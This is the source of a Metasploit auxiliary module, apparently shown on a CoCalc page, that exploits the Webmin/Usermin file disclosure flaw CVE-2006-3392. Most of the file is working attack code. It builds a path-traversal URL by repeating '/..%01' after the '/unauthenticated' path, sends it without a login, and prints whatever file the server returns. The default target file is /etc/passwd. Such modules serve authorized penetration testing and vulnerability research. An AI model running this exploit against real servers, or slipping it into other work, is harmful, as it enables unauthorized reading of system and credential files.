Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(update_info(info,
11
      'Name'           => 'Webmin File Disclosure',
12
      'Description'    => %q{
13
        A vulnerability has been reported in Webmin and Usermin, which can be
14
        exploited by malicious people to disclose potentially sensitive information.
15
        The vulnerability is caused due to an unspecified error within the handling
16
        of an URL. This can be exploited to read the contents of any files on the
17
        server via a specially crafted URL, without requiring a valid login.
18
        The vulnerability has been reported in Webmin (versions prior to 1.290) and
19
        Usermin (versions prior to 1.220).
20
      },
21
      'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          ['OSVDB', '26772'],
26
          ['BID', '18744'],
27
          ['CVE', '2006-3392'],
28
          ['US-CERT-VU', '999601'],
29
          ['URL', 'https://web.archive.org/web/20060722192501/http://secunia.com/advisories/20892/'],
30
        ],
31
      'DisclosureDate' => '2006-06-30',
32
      'Actions'        =>
33
        [
34
          ['Download', 'Description' => 'Download arbitrary file']
35
        ],
36
      'DefaultAction'  => 'Download'
37
      ))
38

39
    register_options(
40
      [
41
        Opt::RPORT(10000),
42
        OptString.new('RPATH',
43
          [
44
            true,
45
            "The file to download",
46
            "/etc/passwd"
47
          ]
48
        ),
49
        OptString.new('DIR',
50
          [
51
            true,
52
            "Webmin directory path",
53
            "/unauthenticated"
54
          ]
55
        ),
56
      ])
57
  end
58

59
  def run
60
    print_status("Attempting to retrieve #{datastore['RPATH']}...")
61

62
    dir = normalize_uri(datastore['DIR'])
63
    uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
64

65
    res = send_request_raw({
66
      'uri'            => uri,
67
    }, 10)
68

69
    if (res)
70
      print_status("The server returned: #{res.code} #{res.message}")
71
      print(res.body)
72
    else
73
      print_status("No response from the server")
74
    end
75
  end
76
end
77

78